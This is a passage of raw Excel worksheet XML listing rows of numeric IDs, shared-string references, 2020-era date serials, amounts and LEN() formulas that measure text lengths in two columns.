        <v>10269</v>
      </c>
      <c r="K224">
        <f>LEN(I224)</f>
        <v>18</v>
      </c>
      <c r="L224">
        <f>LEN(J224)</f>
        <v>74</v>
      </c>
    </row>
    <row r="225" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A225">
        <v>16883</v>
      </c>
      <c r="B225">
        <v>510</v>
      </c>
      <c r="C225" t="s">
        <v>156</v>
      </c>
      <c r="D225" t="s">
        <v>9542</v>
      </c>
      <c r="E225">
        <v>16</v>
      </c>
      <c r="F225" t="s">
        <v>159</v>
      </c>
      <c r="G225" s="1">
        <v>43857</v>
      </c>
      <c r="H225">
        <v>2400</v>
      </c>
      <c r="J225" t="s">
        <v>9543</v>
      </c>
      <c r="K225">
        <f>LEN(I225)</f>
        <v>0</v>
      </c>
      <c r="L225">
        <f>LEN(J225)</f>
        <v>74</v>
      </c>
    </row>
    <row r="226" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A226">
        <v>20760</v>
      </c>
      <c r="B226">
        <v>2559</v>
      </c>
      <c r="C226" t="s">
        <v>4986</v>
      </c>
      <c r="D226" t="s">
        <v>9956</v>
      </c>
      <c r="E226">
        <v>2</v>
      </c>
      <c r="F226" t="s">
        <v>9504</v>
      </c>
      <c r="G226" s="1">
        <v>43992</v>
      </c>
      <c r="H226">
        <v>50000</v>
      </c>
      <c r="J226" t="s">
        <v>10959</v>
      </c>
      <c r="K226">
        <f>LEN(I226)</f>
        <v>0</v>
      </c>
      <c r="L226">
        <f>LEN(J226)</f>
        <v>74</v>
      </c>
    </row>
    <row r="227" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A227">
        <v>20893</v>
      </c>
      <c r="B227">
        <v>1026</v>
      </c>
      <c r="C227" t="s">
        <v>3088</v>
      </c>
      <c r="D227" t="s">
        <v>11046</v>
      </c>
      <c r="E227">
        <v>16</v>
      </c>
      <c r="F227" t="s">
        <v>9523</v>
      </c>
      <c r="G227" s="1">
        <v>44008</v>
      </c>
      <c r="H227">
        <v>0</v>
      </c>
      <c r="J227" t="s">
        <v>11047</v>
      </c>
      <c r="K227">
        <f>LEN(I227)</f>
        <v>0</v>
      </c>
      <c r="L227">
        <f>LEN(J227)</f>
        <v>74</v>
      </c>
    </row>
    <row r="228" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A228">
        <v>20894</v>
      </c>
      <c r="B228">
        <v>1026</v>
      </c>
      <c r="C228" t="s">
        <v>3088</v>
      </c>
      <c r="D228" t="s">
        <v>11046</v>
      </c>
      <c r="E228">
        <v>16</v>
      </c>
      <c r="F228" t="s">
        <v>9681</v>
      </c>
      <c r="G228" s="1">
        <v>44008</v>
      </c>
      <c r="H228">
        <v>0</v>
      </c>
      <c r="J228" t="s">
        <v>11047</v>
      </c>
      <c r="K228">
        <f>LEN(I228)</f>
        <v>0</v>
      </c>
      <c r="L228">
        <f>LEN(J228)</f>
        <v>74</v>
      </c>
    </row>
    <row r="229" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A229">
        <v>21312</v>
      </c>
      <c r="B229">
        <v>241</v>
      </c>
      <c r="C229" t="s">
        <v>1604</v>
      </c>
      <c r="D229" t="s">
        <v>11291</v>
      </c>
      <c r="E229">
        <v>16</v>
      </c>
      <c r="F229" t="s">
        <v>11292</v>
      </c>
      <c r="G229" s="1">
        <v>44061</v>
      </c>
      <c r="H229">
        <v>1700089.77</v>
      </c>
      <c r="I229" t="s">
        <v>11293</v>
      </c>
      <c r="J229" t="s">
        <v>11294</v>
      </c>
      <c r="K229">
        <f>LEN(I229)</f>
        <v>104</v>
      </c>
      <c r="L229">
        <f>LEN(J229)</f>
        <v>73</v>
      </c>
    </row>
    <row r="230" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A230">
        <v>20719</v>
      </c>
      <c r="B230">
        <v>2332</v>
      </c>
      <c r="C230" t="s">
        <v>5974</v>
      </c>
      <c r="D230" t="s">
        <v>9594</v>
      </c>
      <c r="E230">
        <v>13</v>
      </c>
      <c r="F230" t="s">
        <v>10923</v>
      </c>
      <c r="G230" s="1">
        <v>44000</v>
      </c>
      <c r="H230">
        <v>50000</v>
      </c>
      <c r="I230" t="s">
        <v>10924</v>
      </c>
      <c r="J230" t="s">
        <v>10925</v>
      </c>
      <c r="K230">
        <f>LEN(I230)</f>
        <v>56</v>
      </c>
      <c r="L230">
        <f>LEN(J230)</f>
        <v>73</v>
      </c>
    </row>
    <row r="231" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A231">
        <v>19845</v>
      </c>
      <c r="B231">
        <v>1813</v>
      </c>
      <c r="C231" t="s">
        <v>5441</v>
      </c>
      <c r="D231" t="s">
        <v>10278</v>
      </c>
      <c r="E231">
        <v>11</v>
      </c>
      <c r="F231" t="s">
        <v>9681</v>
      </c>
      <c r="G231" s="1">
        <v>43977</v>
      </c>
      <c r="H231">
        <v>10000</v>
      </c>
      <c r="I231" t="s">
        <v>9746</v>
      </c>
      <c r="J231" t="s">
        <v>10280</v>
      </c>
      <c r="K231">
        <f>LEN(I231)</f>
        <v>13</v>
      </c>
      <c r="L231">
        <f>LEN(J231)</f>
        <v>73</v>
      </c>
    </row>
    <row r="232" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A232">
        <v>21152</v>
      </c>
      <c r="B232">
        <v>2719</v>
      </c>
      <c r="C232" t="s">
        <v>6860</v>
      </c>
      <c r="D232" t="s">
        <v>10823</v>
      </c>
      <c r="E232">
        <v>13</v>
      </c>
      <c r="F232" t="s">
        <v>9900</v>
      </c>
      <c r="G232" s="1">
        <v>44007</v>
      </c>
      <c r="H232">
        <v>336990</v>
      </c>
      <c r="J232" t="s">
        <v>11176</v>
      </c>
      <c r="K232">
        <f>LEN(I232)</f>
        <v>0</v>
      </c>
      <c r="L232">
        <f>LEN(J232)</f>
        <v>73</v>
      </c>
    </row>
    <row r="233" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A233">
        <v>21129</v>
      </c>
      <c r="B233">
        <v>2016</v>
      </c>
      <c r="C233" t="s">
        <v>5283</v>
      </c>
      <c r="D233" t="s">
        <v>9488</v>
      </c>
      <c r="E233">
        <v>14</v>
      </c>
      <c r="F233" t="s">
        <v>9523</v>
      </c>
      <c r="G233" s="1">
        <v>44123</v>
      </c>
      <c r="H233">
        <v>300000</v>
      </c>
      <c r="I233" t="s">
        <v>11160</v>
      </c>
      <c r="J233" t="s">
        <v>11161</v>
      </c>
      <c r="K233">
        <f>LEN(I233)</f>
        <v>18</v>
      </c>
      <c r="L233">
        <f>LEN(J233)</f>
        <v>72</v>
      </c>
    </row>
    <row r="234" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A234">
        <v>20625</v>
      </c>
      <c r="B234">
        <v>2332</v>
      </c>
      <c r="C234" t="s">
        <v>5974</v>
      </c>
      <c r="D234" t="s">
        <v>9594</v>
      </c>
      <c r="E234">
        <v>13</v>
      </c>
      <c r="F234" t="s">
        <v>9437</v>
      </c>
      <c r="G234" s="1">
        <v>44000</v>
      </c>
      <c r="H234">
        <v>20000</v>
      </c>
      <c r="I234" t="s">
        <v>10853</v>
      </c>
      <c r="J234" t="s">
        <v>10854</v>
      </c>
      <c r="K234">
        <f>LEN(I234)</f>
        <v>129</v>
      </c>
      <c r="L234">
        <f>LEN(J234)</f>
        <v>71</v>
      </c>
    </row>
    <row r="235" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A235">
        <v>20713</v>
      </c>
      <c r="B235">
        <v>2332</v>
      </c>
      <c r="C235" t="s">
        <v>5974</v>
      </c>
      <c r="D235" t="s">
        <v>9594</v>
      </c>
      <c r="E235">
        <v>13</v>
      </c>
      <c r="F235" t="s">
        <v>2236</v>
      </c>
      <c r="G235" s="1">
        <v>44000</v>
      </c>
      <c r="H235">
        <v>50000</v>
      </c>
      <c r="I235" t="s">
        <v>10915</v>
      </c>
      <c r="J235" t="s">
        <v>10916</v>
      </c>
      <c r="K235">
        <f>LEN(I235)</f>
        <v>109</v>
      </c>
      <c r="L235">
        <f>LEN(J235)</f>
        <v>71</v>
      </c>
    </row>
    <row r="236" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A236">
        <v>19922</v>
      </c>
      <c r="B236">
        <v>2611</v>
      </c>
      <c r="C236" t="s">
        <v>5505</v>
      </c>
      <c r="D236" t="s">
        <v>10332</v>
      </c>
      <c r="E236">
        <v>19</v>
      </c>
      <c r="F236" t="s">
        <v>10333</v>
      </c>
      <c r="G236" s="1">
        <v>43881</v>
      </c>
      <c r="H236">
        <v>100000</v>
      </c>
      <c r="I236" t="s">
        <v>10334</v>
      </c>
      <c r="J236" t="s">
        <v>10335</v>
      </c>
      <c r="K236">
        <f>LEN(I236)</f>
        <v>48</v>
      </c>
      <c r="L236">
        <f>LEN(J236)</f>
        <v>71</v>
      </c>
    </row>
    <row r="237" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A237">
        <v>20718</v>
      </c>
      <c r="B237">
        <v>2332</v>
      </c>
      <c r="C237" t="s">
        <v>5974</v>
      </c>
      <c r="D237" t="s">
        <v>9594</v>
      </c>
      <c r="E237">
        <v>13</v>
      </c>
      <c r="F237" t="s">
        <v>9681</v>
      </c>
      <c r="G237" s="1">
        <v>44000</v>
      </c>
      <c r="H237">
        <v>50000</v>
      </c>
      <c r="I237" t="s">
        <v>9693</v>
      </c>
      <c r="J237" t="s">
        <v>10922</v>
      </c>
      <c r="K237">
        <f>LEN(I237)</f>
        <v>33</v>
      </c>
      <c r="L237">
        <f>LEN(J237)</f>
        <v>71</v>
      </c>
    </row>
    <row r="238" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A238">
        <v>19637</v>
      </c>
      <c r="B238">
        <v>1141</v>
      </c>
      <c r="C238" t="s">
        <v>2635</v>
      </c>
      <c r="D238" t="s">
        <v>10152</v>
      </c>
      <c r="E238">
        <v>13</v>
      </c>
      <c r="F238" t="s">
        <v>9435</v>
      </c>
      <c r="G238" s="1">
        <v>43861</v>
      </c>
      <c r="H238">
        <v>750000</v>
      </c>
      <c r="J238" t="s">
        <v>10153</v>
      </c>
      <c r="K238">
        <f>LEN(I238)</f>
        <v>0</v>
      </c>
      <c r="L238">
        <f>LEN(J238)</f>
        <v>71</v>
      </c>
    </row>
    <row r="239" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A239">
        <v>19640</v>
      </c>
      <c r="B239">
        <v>1141</v>
      </c>
      <c r="C239" t="s">
        <v>2635</v>
      </c>
      <c r="D239" t="s">
        <v>10152</v>
      </c>
      <c r="E239">
        <v>13</v>
      </c>
      <c r="F239" t="s">
        <v>9941</v>
      </c>
      <c r="G239" s="1">
        <v>43861</v>
      </c>
      <c r="H239">
        <v>75000</v>
      </c>
      <c r="J239" t="s">
        <v>10153</v>
      </c>
      <c r="K239">
        <f>LEN(I239)</f>
        <v>0</v>
      </c>
      <c r="L239">
        <f>LEN(J239)</f>
        <v>71</v>
      </c>
    </row>
    <row r="240" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A240">
        <v>20808</v>
      </c>
      <c r="B240">
        <v>2368</v>
      </c>
      <c r="C240" t="s">
        <v>6056</v>
      </c>
      <c r="D240" t="s">
        <v>10993</v>
      </c>
      <c r="E240">
        <v>12</v>
      </c>
      <c r="F240" t="s">
        <v>10994</v>
      </c>
      <c r="G240" s="1">
        <v>44018</v>
      </c>
      <c r="H240">
        <v>100</v>
      </c>
      <c r="I240" t="s">
        <v>10995</v>
      </c>
      <c r="J240" t="s">
        <v>10996</v>
      </c>
      <c r="K240">
        <f>LEN(I240)</f>
        <v>54</v>
      </c>
      <c r="L240">
        <f>LEN(J240)</f>
        <v>70</v>
      </c>
    </row>
    <row r="241" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A241">
        <v>19430</v>
      </c>
      <c r="B241">
        <v>592</v>
      </c>
      <c r="C241" t="s">
        <v>354</v>
      </c>
      <c r="D241" t="s">
        <v>10032</v>
      </c>
      <c r="E241">
        <v>12</v>
      </c>
      <c r="F241" t="s">
        <v>9437</v>
      </c>
      <c r="G241" s="1">
        <v>43900</v>
      </c>
      <c r="H241">
        <v>1200</v>
      </c>
      <c r="J241" t="s">
        <v>10035</v>
      </c>
      <c r="K241">
        <f>LEN(I241)</f>
        <v>0</v>
      </c>
      <c r="L241">
        <f>LEN(J241)</f>
        <v>70</v>
      </c>
    </row>
    <row r="242" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A242">
        <v>19433</v>
      </c>
      <c r="B242">
        <v>2579</v>
      </c>
      <c r="C242" t="s">
        <v>16297</v>
      </c>
      <c r="D242" t="s">
        <v>16298</v>
      </c>
      <c r="E242">
        <v>12</v>
      </c>
      <c r="F242" t="s">
        <v>9437</v>
      </c>
      <c r="G242" s="1">
        <v>43902</v>
      </c>
      <c r="H242" s="4">
        <v>1200000</v>
      </c>
      <c r="J242" t="s">
        <v>10035</v>
      </c>
      <c r="K242">
        <f>LEN(I242)</f>
        <v>0</v>
      </c>
      <c r="L242">
        <f>LEN(J242)</f>
        <v>70</v>
      </c>
    </row>
    <row r="243" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A243">
        <v>20278</v>
      </c>
      <c r="B243">
        <v>2687</v>
      </c>
      <c r="C243" t="s">
        <v>2677</v>
      </c>
      <c r="D243" t="s">
        <v>10594</v>
      </c>
      <c r="E243">
        <v>26</v>
      </c>
      <c r="F243" t="s">
        <v>364</v>
      </c>
      <c r="G243" s="1">
        <v>43895</v>
      </c>
      <c r="H243">
        <v>2950000</v>
      </c>
      <c r="I243" t="s">
        <v>9536</v>
      </c>
      <c r="J243" t="s">
        <v>10595</v>
      </c>
      <c r="K243">
        <f>LEN(I243)</f>
        <v>13</v>
      </c>
      <c r="L243">
        <f>LEN(J243)</f>
        <v>69</v>
      </c>
    </row>
    <row r="244" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A244">
        <v>19632</v>
      </c>
      <c r="B244">
        <v>686</v>
      </c>
      <c r="C244" t="s">
        <v>16299</v>
      </c>
      <c r="D244" t="s">
        <v>16300</v>
      </c>
      <c r="E244">
        <v>1</v>
      </c>
      <c r="F244" t="s">
        <v>10147</v>
      </c>
      <c r="G244" s="1">
        <v>43871</v>
      </c>
      <c r="H244" s="4">
        <v>100000</v>
      </c>
      <c r="I244" t="s">
        <v>10141</v>
      </c>
      <c r="J244" t="s">
        <v>10148</v>
      </c>
      <c r="K244">
        <f>LEN(I244)</f>
        <v>107</v>
      </c>
      <c r="L244">
        <f>LEN(J244)</f>
        <v>68</v>
      </c>
    </row>
    <row r="245" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A245">
        <v>19633</v>
      </c>
      <c r="B245">
        <v>686</v>
      </c>
      <c r="C245" t="s">
        <v>16299</v>
      </c>
      <c r="D245" t="s">
        <v>16300</v>
      </c>
      <c r="E245">
        <v>1</v>
      </c>
      <c r="F245" t="s">
        <v>7241</v>
      </c>
      <c r="G245" s="1">
        <v>43871</v>
      </c>
      <c r="H245" s="4">
        <v>100000</v>
      </c>
      <c r="I245" t="s">
        <v>10149</v>
      </c>
      <c r="J245" t="s">
        <v>10148</v>
      </c>
      <c r="K245">
        <f>LEN(I245)</f>
        <v>107</v>
      </c>
      <c r="L245">
        <f>LEN(J245)</f>
        <v>68</v>
      </c>
    </row>
    <row r="246" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A246">
        <v>20306</v>
      </c>
      <c r="B246">
        <v>2605</v>
      </c>
      <c r="C246" t="s">
        <v>5690</v>
      </c>
      <c r="D246" t="s">
        <v>10613</v>
      </c>
      <c r="E246">
        <v>11</v>
      </c>
      <c r="F246" t="s">
        <v>10615</v>
      </c>
      <c r="G246" s="1">
        <v>43949</v>
      </c>
      <c r="H246">
        <v>100000</v>
      </c>
      <c r="I246" t="s">
        <v>10031</v>
      </c>
      <c r="J246" t="s">
        <v>10616</v>
      </c>
      <c r="K246">
        <f>LEN(I246)</f>
        <v>100</v>
      </c>
      <c r="L246">
        <f>LEN(J246)</f>
        <v>68</v>
      </c>
    </row>
    <row r="247" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A247">
        <v>20976</v>
      </c>
      <c r="B247">
        <v>609</v>
      </c>
      <c r="C247" t="s">
        <v>857</v>
      </c>
      <c r="D247" t="s">
        <v>11086</v>
      </c>
      <c r="E247">
        <v>26</v>
      </c>
      <c r="F247" t="s">
        <v>11087</v>
      </c>
      <c r="G247" s="1">
        <v>44106</v>
      </c>
      <c r="H247">
        <v>500000</v>
      </c>
      <c r="J247" t="s">
        <v>10148</v>
      </c>
      <c r="K247">
        <f>LEN(I247)</f>
        <v>0</v>
      </c>
      <c r="L247">
        <f>LEN(J247)</f>
        <v>68</v>
      </c>
    </row>
    <row r="248" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A248">
        <v>20977</v>
      </c>
      <c r="B248">
        <v>609</v>
      </c>
      <c r="C248" t="s">
        <v>857</v>
      </c>
      <c r="D248" t="s">
        <v>11086</v>
      </c>
      <c r="E248">
        <v>26</v>
      </c>
      <c r="F248" t="s">
        <v>9590</v>
      </c>
      <c r="G248" s="1">
        <v>44106</v>
      </c>
      <c r="H248">
        <v>500000</v>
      </c>
      <c r="J248" t="s">
        <v>10148</v>
      </c>
      <c r="K248">
        <f>LEN(I248)</f>
        <v>0</v>
      </c>
      <c r="L248">
        <f>LEN(J248)</f>
        <v>68</v>
      </c>
    </row>
    <row r="249" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A249">
        <v>19249</v>
      </c>
      <c r="B249">
        <v>2068</v>
      </c>
      <c r="C249" t="s">
        <v>4780</v>
      </c>
      <c r="D249" t="s">
        <v>9856</v>
      </c>
      <c r="E249">
        <v>16</v>
      </c>
      <c r="F249" t="s">
        <v>7241</v>
      </c>
      <c r="G249" s="1">
        <v>43875</v>
      </c>
      <c r="H249">
        <v>150</v>
      </c>
      <c r="I249" t="s">
        <v>9869</v>
      </c>
      <c r="J249" t="s">
        <v>9859</v>
      </c>
      <c r="K249">
        <f>LEN(I249)</f>
        <v>276</v>
      </c>
      <c r="L249">
        <f>LEN(J249)</f>
        <v>67</v>
      </c>
    </row>
    <row r="250" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A250">
        <v>19248</v>
      </c>
      <c r="B250">
        <v>2068</v>
      </c>
      <c r="C250" t="s">
        <v>4780</v>
      </c>
      <c r="D250" t="s">
        <v>9856</v>
      </c>
      <c r="E250">
        <v>16</v>
      </c>
      <c r="F250" t="s">
        <v>9535</v>
      </c>
      <c r="G250" s="1">
        <v>43875</v>
      </c>
      <c r="H250">
        <v>150000</v>
      </c>
      <c r="I250" t="s">
        <v>9868</v>
      </c>
      <c r="J250" t="s">
        <v>9859</v>
      </c>
      <c r="K250">
        <f>LEN(I250)</f>
        <v>271</v>
      </c>
      <c r="L250">
        <f>LEN(J250)</f>
        <v>67</v>
      </c>
    </row>
    <row r="251" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A251">
        <v>19241</v>
      </c>
      <c r="B251">
        <v>2068</v>
      </c>
      <c r="C251" t="s">
        <v>4780</v>
      </c>
      <c r="D251" t="s">
        <v>9856</v>
      </c>
      <c r="E251">
        <v>16</v>
      </c>
      <c r="F251" t="s">
        <v>9857</v>
      </c>
      <c r="G251" s="1">
        <v>43875</v>
      </c>
      <c r="H251">
        <v>180000</v>
      </c>
      <c r="I251" t="s">
        <v>9858</v>
      </c>
      <c r="J251" t="s">
        <v>9859</v>
      </c>
      <c r="K251">
        <f>LEN(I251)</f>
        <v>130</v>
      </c>
      <c r="L251">
        <f>LEN(J251)</f>
        <v>67</v>
      </c>
    </row>
    <row r="252" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A252">
        <v>20809</v>
      </c>
      <c r="B252">
        <v>2368</v>
      </c>
      <c r="C252" t="s">
        <v>6056</v>
      </c>
      <c r="D252" t="s">
        <v>10993</v>
      </c>
      <c r="E252">
        <v>12</v>
      </c>
      <c r="F252" t="s">
        <v>2236</v>
      </c>
      <c r="G252" s="1">
        <v>44018</v>
      </c>
      <c r="H252">
        <v>100</v>
      </c>
      <c r="I252" t="s">
        <v>9550</v>
      </c>
      <c r="J252" t="s">
        <v>9957</v>
      </c>
      <c r="K252">
        <f>LEN(I252)</f>
        <v>18</v>
      </c>
      <c r="L252">
        <f>LEN(J252)</f>
        <v>67</v>
      </c>
    </row>
    <row r="253" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A253">
        <v>19360</v>
      </c>
      <c r="B253">
        <v>2559</v>
      </c>
      <c r="C253" t="s">
        <v>16281</v>
      </c>
      <c r="D253" t="s">
        <v>16282</v>
      </c>
      <c r="E253">
        <v>2</v>
      </c>
      <c r="F253" t="s">
        <v>9466</v>
      </c>
      <c r="G253" s="1">
        <v>43906</v>
      </c>
      <c r="H253" s="4">
        <v>600000</v>
      </c>
      <c r="J253" t="s">
        <v>9957</v>
      </c>
      <c r="K253">
        <f>LEN(I253)</f>
        <v>0</v>
      </c>
      <c r="L253">
        <f>LEN(J253)</f>
        <v>67</v>
      </c>
    </row>
    <row r="254" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A254">
        <v>20969</v>
      </c>
      <c r="B254">
        <v>746</v>
      </c>
      <c r="C254" t="s">
        <v>1373</v>
      </c>
      <c r="D254" t="s">
        <v>11083</v>
      </c>
      <c r="E254">
        <v>32</v>
      </c>
      <c r="F254" t="s">
        <v>6917</v>
      </c>
      <c r="G254" s="1">
        <v>44235</v>
      </c>
      <c r="H254">
        <v>100000</v>
      </c>
      <c r="J254" t="s">
        <v>11084</v>
      </c>
      <c r="K254">
        <f>LEN(I254)</f>
        <v>0</v>
      </c>
      <c r="L254">
        <f>LEN(J254)</f>
        <v>67</v>
      </c>
    </row>
    <row r="255" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A255">
        <v>20970</v>
      </c>
      <c r="B255">
        <v>746</v>
      </c>
      <c r="C255" t="s">
        <v>1373</v>
      </c>
      <c r="D255" t="s">
        <v>11083</v>
      </c>
      <c r="E255">
        <v>32</v>
      </c>
      <c r="F255" t="s">
        <v>11085</v>
      </c>
      <c r="G255" s="1">
        <v>44235</v>
      </c>
      <c r="H255">
        <v>100000</v>
      </c>
      <c r="J255" t="s">
        <v>11084</v>
      </c>
      <c r="K255">
        <f>LEN(I255)</f>
        <v>0</v>
      </c>
      <c r="L255">
        <f>LEN(J255)</f>
        <v>67</v>
      </c>
    </row>
    <row r="256" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A256">
        <v>21283</v>
      </c>
      <c r="B256">
        <v>444</v>
      </c>
      <c r="C256" t="s">
        <v>1595</v>
      </c>
      <c r="D256" t="s">
        <v>11264</v>
      </c>
      <c r="E256">
        <v>16</v>
      </c>
      <c r="F256" t="s">
        <v>9497</v>
      </c>
      <c r="G256" s="1">
        <v>44155</v>
      </c>
      <c r="H256">
        <v>51190</v>
      </c>
      <c r="J256" t="s">
        <v>11084</v>
      </c>
      <c r="K256">
        <f>LEN(I256)</f>
        <v>0</v>
      </c>
      <c r="L256">
        <f>LEN(J256)</f>
        <v>67</v>
      </c>
    </row>
    <row r="257" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A257">
        <v>21313</v>
      </c>
      <c r="B257">
        <v>241</v>
      </c>
      <c r="C257" t="s">
        <v>1604</v>
      </c>
      <c r="D257" t="s">
        <v>11287</v>
      </c>
      <c r="E257">
        <v>16</v>
      </c>
      <c r="F257" t="s">
        <v>9437</v>
      </c>
      <c r="G257" s="1">
        <v>44061</v>
      </c>
      <c r="H257">
        <v>413164.7</v>
      </c>
      <c r="I257" t="s">
        <v>11295</v>
      </c>
      <c r="J257" t="s">
        <v>11296</v>
      </c>
      <c r="K257">
        <f>LEN(I257)</f>
        <v>70</v>
      </c>
      <c r="L257">
        <f>LEN(J257)</f>
        <v>66</v>
      </c>
    </row>
    <row r="258" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A258">
        <v>20120</v>
      </c>
      <c r="B258">
        <v>280</v>
      </c>
      <c r="C258" t="s">
        <v>702</v>
      </c>
      <c r="D258" t="s">
        <v>10484</v>
      </c>
      <c r="E258">
        <v>16</v>
      </c>
      <c r="F258" t="s">
        <v>1746</v>
      </c>
      <c r="G258" s="1">
        <v>44176</v>
      </c>
      <c r="H258">
        <v>500000</v>
      </c>
      <c r="I258" t="s">
        <v>10323</v>
      </c>
      <c r="J258" t="s">
        <v>10485</v>
      </c>
      <c r="K258">
        <f>LEN(I258)</f>
        <v>33</v>
      </c>
      <c r="L258">
        <f>LEN(J258)</f>
        <v>66</v>
      </c>
    </row>
    <row r="259" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A259">
        <v>17094</v>
      </c>
      <c r="B259">
        <v>716</v>
      </c>
      <c r="C259" t="s">
        <v>1252</v>
      </c>
      <c r="D259" t="s">
        <v>9653</v>
      </c>
      <c r="E259">
        <v>2</v>
      </c>
      <c r="F259" t="s">
        <v>9654</v>
      </c>
      <c r="G259" s="1">
        <v>43885</v>
      </c>
      <c r="H259">
        <v>300000</v>
      </c>
      <c r="I259" t="s">
        <v>9603</v>
      </c>
      <c r="J259" t="s">
        <v>9655</v>
      </c>
      <c r="K259">
        <f>LEN(I259)</f>
        <v>10</v>
      </c>
      <c r="L259">
        <f>LEN(J259)</f>
        <v>66</v>
      </c>
    </row>
    <row r="260" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A260">
        <v>17095</v>
      </c>
      <c r="B260">
        <v>716</v>
      </c>
      <c r="C260" t="s">
        <v>1252</v>
      </c>
      <c r="D260" t="s">
        <v>9653</v>
      </c>
      <c r="E260">
        <v>2</v>
      </c>
      <c r="F260" t="s">
        <v>9656</v>
      </c>
      <c r="G260" s="1">
        <v>43885</v>
      </c>
      <c r="H260">
        <v>700000</v>
      </c>
      <c r="I260" t="s">
        <v>9603</v>
      </c>
      <c r="J260" t="s">
        <v>9655</v>
      </c>
      <c r="K260">
        <f>LEN(I260)</f>
        <v>10</v>
      </c>
      <c r="L260">
        <f>LEN(J260)</f>
        <v>66</v>
      </c>
    </row>
    <row r="261" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A261">
        <v>17096</v>
      </c>
      <c r="B261">
        <v>716</v>
      </c>
      <c r="C261" t="s">
        <v>1252</v>
      </c>
      <c r="D261" t="s">
        <v>9653</v>
      </c>
      <c r="E261">
        <v>2</v>
      </c>
      <c r="F261" t="s">
        <v>9437</v>
      </c>
      <c r="G261" s="1">
        <v>43885</v>
      </c>
      <c r="H261">
        <v>600000</v>
      </c>
      <c r="I261" t="s">
        <v>9603</v>
      </c>
      <c r="J261" t="s">
        <v>9655</v>
      </c>
      <c r="K261">
        <f>LEN(I261)</f>
        <v>10</v>
      </c>
      <c r="L261">
        <f>LEN(J261)</f>
        <v>66</v>
      </c>
    </row>
    <row r="262" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A262">
        <v>20372</v>
      </c>
      <c r="B262">
        <v>2610</v>
      </c>
      <c r="C262" t="s">
        <v>5637</v>
      </c>
      <c r="D262" t="s">
        <v>10495</v>
      </c>
      <c r="E262">
        <v>2</v>
      </c>
      <c r="F262" t="s">
        <v>10664</v>
      </c>
      <c r="G262" s="1">
        <v>43914</v>
      </c>
      <c r="H262">
        <v>1000</v>
      </c>
      <c r="I262" t="s">
        <v>9603</v>
      </c>
      <c r="J262" t="s">
        <v>10665</v>
      </c>
      <c r="K262">
        <f>LEN(I262)</f>
        <v>10</v>
      </c>
      <c r="L262">
        <f>LEN(J262)</f>
        <v>66</v>
      </c>
    </row>
    <row r="263" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A263">
        <v>20308</v>
      </c>
      <c r="B263">
        <v>2605</v>
      </c>
      <c r="C263" t="s">
        <v>5690</v>
      </c>
      <c r="D263" t="s">
        <v>10613</v>
      </c>
      <c r="E263">
        <v>11</v>
      </c>
      <c r="F263" t="s">
        <v>10617</v>
      </c>
      <c r="G263" s="1">
        <v>43949</v>
      </c>
      <c r="H263">
        <v>100000</v>
      </c>
      <c r="I263" t="s">
        <v>10031</v>
      </c>
      <c r="J263" t="s">
        <v>10618</v>
      </c>
      <c r="K263">
        <f>LEN(I263)</f>
        <v>100</v>
      </c>
      <c r="L263">
        <f>LEN(J263)</f>
        <v>65</v>
      </c>
    </row>
    <row r="264" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A264">
        <v>20309</v>
      </c>
      <c r="B264">
        <v>2605</v>
      </c>
      <c r="C264" t="s">
        <v>5690</v>
      </c>
      <c r="D264" t="s">
        <v>10613</v>
      </c>
      <c r="E264">
        <v>11</v>
      </c>
      <c r="F264" t="s">
        <v>10619</v>
      </c>
      <c r="G264" s="1">
        <v>43949</v>
      </c>
      <c r="H264">
        <v>100000</v>
      </c>
      <c r="I264" t="s">
        <v>10031</v>
      </c>
      <c r="J264" t="s">
        <v>10618</v>
      </c>
      <c r="K264">
        <f>LEN(I264)</f>
        <v>100</v>
      </c>
      <c r="L264">
        <f>LEN(J264)</f>
        <v>65</v>
      </c>
    </row>
    <row r="265" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A265">
        <v>20310</v>
      </c>
      <c r="B265">
        <v>2605</v>
      </c>
      <c r="C265" t="s">
        <v>5690</v>
      </c>
      <c r="D265" t="s">
        <v>10613</v>
      </c>
      <c r="E265">
        <v>11</v>
      </c>
      <c r="F265" t="s">
        <v>2236</v>
      </c>
      <c r="G265" s="1">
        <v>43949</v>
      </c>
      <c r="H265">
        <v>100000</v>
      </c>
      <c r="I265" t="s">
        <v>10031</v>
      </c>
      <c r="J265" t="s">
        <v>10618</v>
      </c>
      <c r="K265">
        <f>LEN(I265)</f>
        <v>100</v>
      </c>
      <c r="L265">
        <f>LEN(J265)</f>
        <v>65</v>
